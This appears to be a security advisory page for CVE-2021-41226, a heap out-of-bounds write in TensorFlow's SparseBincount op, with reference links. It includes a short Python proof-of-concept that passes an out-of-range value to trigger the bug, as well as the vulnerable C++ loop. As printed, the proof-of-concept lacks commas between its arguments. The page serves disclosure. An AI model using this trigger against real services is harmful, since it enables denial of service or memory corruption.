CVE-2021-41226: Heap OOB in `SparseBinCount`
(updated )
The implementation of SparseBinCount is vulnerable to a heap OOB:
import tensorflow as tf
tf.raw_ops.SparseBincount(
indices=[[0],[1],[2]]
values=[0,-10000000]
dense_shape=[1,1]
size=[1]
weights=[3,2,1]
binary_output=False)
This is because of missing validation between the elements of the values argument and the shape of the sparse output:
for (int64_t i = 0; i < indices_mat.dimension(0); ++i) {
const int64_t batch = indices_mat(i, 0);
const Tidx bin = values(i);
...
out(batch, bin) = ...;
}
References
- github.com/advisories/GHSA-374m-jm66-3vj8
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-635.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-833.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-418.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/f410212e373eb2aec4c9e60bf3702eba99a38aba
- github.com/tensorflow/tensorflow/security/advisories/GHSA-374m-jm66-3vj8
- nvd.nist.gov/vuln/detail/CVE-2021-41226
Detect and mitigate CVE-2021-41226 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →